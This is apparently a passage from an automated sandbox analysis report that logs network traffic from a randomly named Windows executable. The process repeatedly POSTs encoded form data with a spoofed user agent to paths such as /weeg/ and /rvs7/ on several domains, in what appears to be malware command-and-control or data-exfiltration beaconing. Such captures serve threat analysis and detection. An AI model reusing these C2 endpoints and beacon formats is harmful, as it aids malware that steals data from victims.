                                                  Data Raw: 77 78 57 3d 5a 53 33 57 77 75 78 36 4d 79 32 4d 55 62 51 57 42 73 4b 77 70 58 6f 38 73 49 38 74 46 6a 48 62 2b 57 6a 36 76 63 6c 31 7a 44 71 41 35 72 6a 39 72 78 47 2b 78 47 71 55 6c 51 36 4b 53 43 56 4a 51 2b 53 52 65 6e 7a 65 4e 43 68 48 2b 72 44 41 55 36 73 79 52 4f 59 41 67 4c 37 32 6e 7a 4f 39 65 67 2b 33 37 56 49 53 63 31 75 52 50 32 66 39 75 44 57 52 72 36 74 57 62 46 72 31 76 6a 30 54 48 38 36 44 31 39 64 2b 41 41 42 77 47 6b 78 41 78 65 72 64 46 2b 33 7a 46 6f 75 58 2f 31 38 64 63 39 46 56 41 6c 34 67 2f 6a 48 6a 4c 66 6a 73 33 30 69 32 71 42 55 64 42 6e 37 39 50 37 52 4d 67 48 61 7a 74 78 32 6a 2f 58 45 70 32 66 6e 54 36 66 4b 76 78 4f 4c 39 32 32 78 6f 6f 6d 6e 78 4c 32 6c 38 6b 4e 41 6e 6e 44 43 38 62 6a 76 36 55 76 6c 56 43 39 4d 56 50 38 64 6f 5a 35 51 61 74 66 6a 2f 67 6f 72 53 31 72 62 6e 30 67 76 38 33 53 50 32 72 58 4f 59 6f 61 70 44 64 6a 50 32 63 66 42 48 30 5a 53 62 76 30 67 46 36 54 42 66 6d 4a 55 57 2b 51 69 72 72 45 48 2b 47 5a 7a 49 61 5a 6a 61 76 6c 44 72 52 46 74 45 75 35 [TRUNCATED]
                                                  Data Ascii: wxW=ZS3Wwux6My2MUbQWBsKwpXo8sI8tFjHb+Wj6vcl1zDqA5rj9rxG+xGqUlQ6KSCVJQ+SRenzeNChH+rDAU6syROYAgL72nzO9eg+37VISc1uRP2f9uDWRr6tWbFr1vj0TH86D19d+AABwGkxAxerdF+3zFouX/18dc9FVAl4g/jHjLfjs30i2qBUdBn79P7RMgHaztx2j/XEp2fnT6fKvxOL922xoomnxL2l8kNAnnDC8bjv6UvlVC9MVP8doZ5Qatfj/gorS1rbn0gv83SP2rXOYoapDdjP2cfBH0ZSbv0gF6TBfmJUW+QirrEH+GZzIaZjavlDrRFtEu5rtQHv1NyjgUHs43X6J41SME2gzd9xCW78p6TYcHT5IOiMzvo6/oHJodf409xTEEzv+H4BstdkMacpyDH+upcNU4JoCMXpv1hK2jIdjzn0f6ugrUVU7mfXkZV4WFiOG5eBTP5QXTUH2RhzAO+N+v3ypUOWSx8I2dpwvsgZUCwRXnLIARJbDy3GQZ0rARa+iik14oJLjZh1A/3fIQJ9do4qqL4pQ8VWKQsMVd+EBSU65lp6rkRn9tk12aDGJD7SxFHVz9luiIIdakG3FK5ke1NnNcEggBzwDDl7pGQCSGQo5auilghE+3gVKPp+EMmPD6xwbWl4u5RuKn8vAJR7Xto9noxaM+OvQXrOdLFr1T9N/x8ypAXIXH8JQe58NxT2x0thsICX6gUlzlyuVx7RrSsyGdrt829j1LTpcNkJ7KKTTeQR6gi0sU8YISCTtmCKkQPrVs3k1g4LlFBBTrzEkt5EfXL+H5fAYw2JeZeRRgQsSTyZcaHMmsFTSi9otM/UU6iWRrLaoR183xDrpYt6jTsQca1Lihnp8Rj32pLyY6UCpgQIXNz8JnAYGNG6QYc8CzF1EexCbOunN4Nhu8zveK9wEqZEXUUK8eqdxr9s7ki7jz+rnixAMZX1MJ/0g3zMFzcD5n72POlnGknaedDVwhvdrv8L55bzmKG1r [TRUNCATED]
                                                  Aug 16, 2024 09:33:34.436708927 CEST1576OUTData Raw: 34 38 5a 64 37 64 44 36 6b 49 79 44 55 70 66 4b 6b 2f 43 52 6e 6c 7a 4e 79 63 47 45 34 47 30 63 53 56 5a 64 48 52 77 36 39 74 54 4e 56 58 41 59 61 73 37 66 2b 59 61 46 55 4d 32 57 75 59 53 33 6d 4c 5a 46 4a 61 6b 55 66 51 42 33 30 43 2f 4b 4d 56
                                                  Data Ascii: 48Zd7dD6kIyDUpfKk/CRnlzNycGE4G0cSVZdHRw69tTNVXAYas7f+YaFUM2WuYS3mLZFJakUfQB30C/KMVnvpEytU8MTYqM3IlWvdld/zpexPEWh6H7cDNwfnQ7b0UD82eXL6Zp54lUVlh+buwZRv5CWFvmYjwE3qFngf/yhIAOjRpMNOfiD0XJkX2m94IAnmRCkS3R+MCt2nGkZ3PnPPGlemOOBkwGqwBIXYSAMfL+0KXJWXHh
                                                  Aug 16, 2024 09:33:35.043414116 CEST1236INHTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: 5dce5dc8-dfe6-4c3c-973a-f7abe45f17b2
                                                  x-runtime: 0.070311
                                                  content-length: 21532
                                                  connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                  Aug 16, 2024 09:33:35.043431044 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                  Aug 16, 2024 09:33:35.043441057 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                  Aug 16, 2024 09:33:35.043445110 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                  Aug 16, 2024 09:33:35.043452024 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                  Aug 16, 2024 09:33:35.043461084 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                                  Aug 16, 2024 09:33:35.043473005 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                                  Aug 16, 2024 09:33:35.043524027 CEST1000INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                                  Aug 16, 2024 09:33:35.043534040 CEST1236INData Raw: 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69
                                                  Data Ascii: ;</a><br><a class="trace-frames" data-frame-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middl
                                                  Aug 16, 2024 09:33:35.043545008 CEST1236INData Raw: 65 73 27 29 3b 0a 20 20 20 20 76 61 72 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2c 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 66 72 61 6d 65 2d 73 6f 75 72 63 65
                                                  Data Ascii: es'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.2249178216.40.34.41801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:36.972538948 CEST350OUTGET /rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L46 HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:37.462256908 CEST1236INHTTP/1.1 200 OK
                                                  x-frame-options: SAMEORIGIN
                                                  x-xss-protection: 1; mode=block
                                                  x-content-type-options: nosniff
                                                  x-download-options: noopen
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: strict-origin-when-cross-origin
                                                  content-type: text/html; charset=utf-8
                                                  etag: W/"f668d0a14f5105d8d48cb2a5cfaf2d4a"
                                                  cache-control: max-age=0, private, must-revalidate
                                                  x-request-id: 3811b54e-10d8-4a84-94a1-b1dfee7018f4
                                                  x-runtime: 0.007635
                                                  transfer-encoding: chunked
                                                  connection: close
                                                  Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                  Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>gymuniversity.net is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expi
                                                  Aug 16, 2024 09:33:37.462275028 CEST1236INData Raw: 72 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63
                                                  Data Ascii: red"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>gymuniversity.net</h1><h2>has expired.</h2><div class='cta'><a class='btn' href=
                                                  Aug 16, 2024 09:33:37.462284088 CEST1236INData Raw: 70 72 69 63 69 6e 67 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                  Data Ascii: pricing?source=expired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofoll
                                                  Aug 16, 2024 09:33:37.462310076 CEST672INData Raw: 32 34 39 39 32 20 31 35 2e 34 37 30 36 37 2c 2d 31 39 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38 2e 35 33 38 34 31 20 2d 36 2e 34 31
                                                  Data Ascii: 24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -
                                                  Aug 16, 2024 09:33:37.462321043 CEST1236INData Raw: 34 33 34 34 31 20 2d 31 32 2e 30 34 32 32 37 2c 39 2e 34 33 37 39 36 20 2d 32 37 2e 32 31 33 36 36 2c 31 35 2e 30 36 33 33 35 20 2d 34 33 2e 36 39 39 36 35 2c 31 35 2e 30 36 33 33 35 20 2d 32 2e 38 34 30 31 34 2c 30 20 2d 35 2e 36 34 30 38 32 2c
                                                  Data Ascii: 43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.
                                                  Aug 16, 2024 09:33:37.462332010 CEST1016INData Raw: 74 2d 38 38 20 35 38 71 2d 32 39 20 31 31 20 2d 37 31 2e 35 20 31 38 2e 35 74 2d 31 30 33 20 31 30 74 2d 39 36 2e 35 20 33 74 2d 31 30 35 2e 35 20 30 74 2d 37 36 2e 35 20 2d 30 2e 35 7a 4d 31 35 33 36 20 36 34 30 71 30 20 2d 32 32 39 20 2d 35 20
                                                  Data Ascii: t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124t-124 322q-5 88 -5 3133A7t5 317q10 208 124 322t322 124q88 5 317 5t317 -5q208 -10 322


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.2249179103.249.106.91801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:42.648857117 CEST2472OUTPOST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 7a 76 56 50 63 54 4e 4a 64 6b 56 63 4b 4c 43 63 76 6c 44 57 49 46 67 7a 30 77 39 4a 4f 57 4a 37 65 4f 4f 76 38 54 51 49 66 46 76 42 35 71 2f 75 69 76 76 66 7a 31 4a 44 62 62 4d 43 79 31 71 79 45 38 32 78 4b 64 44 77 75 50 59 2f 4e 39 6e 73 39 59 7a 4d 42 48 46 50 57 64 79 64 37 4e 31 76 42 4d 38 62 57 54 65 58 59 79 72 34 70 6d 42 71 71 51 53 39 4c 74 42 32 6a 36 61 49 33 32 4b 55 34 65 42 58 63 73 42 51 70 2b 6a 4f 35 6a 51 39 51 54 79 46 2f 78 52 58 55 54 62 49 75 57 66 2b 58 62 61 38 51 68 76 30 4e 6a 77 59 65 61 62 34 49 31 6d 38 4f 6b 5a 59 51 49 68 47 30 57 67 4b 66 4e 33 45 6f 55 46 6d 62 74 4b 75 66 52 5a 69 49 33 76 4a 57 51 64 59 51 4f 30 4c 57 69 43 6e 6e 43 2f 58 4b 58 2f 61 36 69 56 56 55 51 74 78 4e 74 71 42 46 4a 77 4d 69 67 33 33 6c 34 72 44 72 69 78 56 76 58 55 32 42 62 4d 31 75 6f 38 45 54 49 77 2b 61 42 31 44 64 46 37 4f 50 54 6f 37 63 33 54 46 73 42 48 7a 61 32 57 52 4c 6c 4b 34 35 55 30 33 63 5a 37 68 67 35 39 6e 5a 41 77 31 36 76 41 4f 30 35 74 71 6e 39 6a 56 59 64 [TRUNCATED]
                                                  Data Ascii: wxW=zvVPcTNJdkVcKLCcvlDWIFgz0w9JOWJ7eOOv8TQIfFvB5q/uivvfz1JDbbMCy1qyE82xKdDwuPY/N9ns9YzMBHFPWdyd7N1vBM8bWTeXYyr4pmBqqQS9LtB2j6aI32KU4eBXcsBQp+jO5jQ9QTyF/xRXUTbIuWf+Xba8Qhv0NjwYeab4I1m8OkZYQIhG0WgKfN3EoUFmbtKufRZiI3vJWQdYQO0LWiCnnC/XKX/a6iVVUQtxNtqBFJwMig33l4rDrixVvXU2BbM1uo8ETIw+aB1DdF7OPTo7c3TFsBHza2WRLlK45U03cZ7hg59nZAw16vAO05tqn9jVYdxdqAQ3yKSZ2WZAAigPQWPFQw7WM2hwiIu5ZOnpSoUr3RFyy1Dc9VzCwX/U7XKuJk1p8wFRpJg1rRTJWNmUHXsE11Y7qNiKigEn2dTvz4I4GwpbAmu4OoZEJ4w651QZC2bYzUlbdbMr7NF4sRgm+WJBKsWILKgLfompX7WAFtUpWK/qkqT+fP4Zw8AuzznvE9F4V3c3S7b25hQbtbUkfHJw/pIpbdJ4gmlGor3PJ13kHXQZ3LY/596w0VREFL9WulqgbhEECLXe8BlkT9mntsUAvXgdv+B3aCGCy6hprlpt9CeOBDKvF4s2bN15o+3wJg5CaFY6FaDqWLouU/oLnuzWgneZKKHTgagiHNGS+4pM1bI1/E+JQ8+tbZ5xh3pwRvA4kTwCBHHKd/M/dLNMiM3rRx0ZOIDuYcneL7yj9stHqNwKcf4CKlOqjXxS2+SfDKBjI/mpdxWABuIrxrAk7DPYWSyNGo7IbqqBYmq/Ghd4p3E2ruhOZHSPhiASqm49bQHw9JSAT6PO8PIcf9WIduB5MG6DWkXjY08Th8vHxmcqxPXMrCPrjXD+sMR3GN3P/yloWQuxM3vamyyhDpeUp5G+CjdSr2LfVG4C1eqMDPCaH0qKOwKXanV39obclcAwwo651IZC00wSTwN+qG/w6MwrKo+U3Gv2e5D4 [TRUNCATED]
                                                  Aug 16, 2024 09:33:42.653795958 CEST94OUTData Raw: 59 68 49 54 46 37 2b 35 34 32 74 47 38 48 76 79 43 78 30 67 77 73 42 53 2f 44 52 78 44 78 30 51 72 59 38 65 43 58 4f 72 4c 50 76 73 56 36 67 66 78 71 68 65 5a 76 56 6d 49 49 49 46 79 73 31 54 46 44 44 77 4f 75 37 79 74 50 64 63 70 77 4a 4a 64 36
                                                  Data Ascii: YhITF7+542tG8HvyCx0gwsBS/DRxDx0QrY8eCXOrLPvsV6gfxqheZvVmIIIFys1TFDDwOu7ytPdcpwJJd64IKIkkYVTo+5
                                                  Aug 16, 2024 09:33:43.550184965 CEST190INHTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:43 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.2249180103.249.106.91801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:45.196132898 CEST605OUTPOST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 7a 76 56 50 63 54 4e 4a 64 6b 56 63 4b 49 71 63 76 30 44 57 4c 6c 67 7a 35 51 39 4a 46 32 4a 39 65 4f 43 64 38 57 77 59 66 32 50 42 36 37 50 75 68 63 48 66 77 31 4a 41 44 72 4d 47 38 56 71 6e 45 38 32 63 4b 5a 4c 77 75 50 4d 2f 4e 59 37 73 37 61 62 50 44 33 46 4e 5a 39 79 59 37 4e 6f 52 42 4d 77 4c 57 53 32 58 59 31 50 34 6d 47 52 71 38 6c 2b 39 64 74 42 30 6c 36 61 54 33 32 47 6b 34 65 51 55 63 73 39 51 70 50 2f 4f 34 7a 77 39 56 45 65 46 6d 68 52 61 52 54 62 57 70 6e 44 78 52 49 79 46 61 44 4f 61 54 48 77 2f 61 59 32 37 42 30 65 4f 4f 6d 70 68 62 76 34 58 30 6d 73 41 4d 51 3d 3d
                                                  Data Ascii: wxW=zvVPcTNJdkVcKIqcv0DWLlgz5Q9JF2J9eOCd8WwYf2PB67PuhcHfw1JADrMG8VqnE82cKZLwuPM/NY7s7abPD3FNZ9yY7NoRBMwLWS2XY1P4mGRq8l+9dtB0l6aT32Gk4eQUcs9QpP/O4zw9VEeFmhRaRTbWpnDxRIyFaDOaTHw/aY27B0eOOmphbv4X0msAMQ==
                                                  Aug 16, 2024 09:33:46.273192883 CEST190INHTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:46 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.2249181103.249.106.91801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:47.739265919 CEST2472OUTPOST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
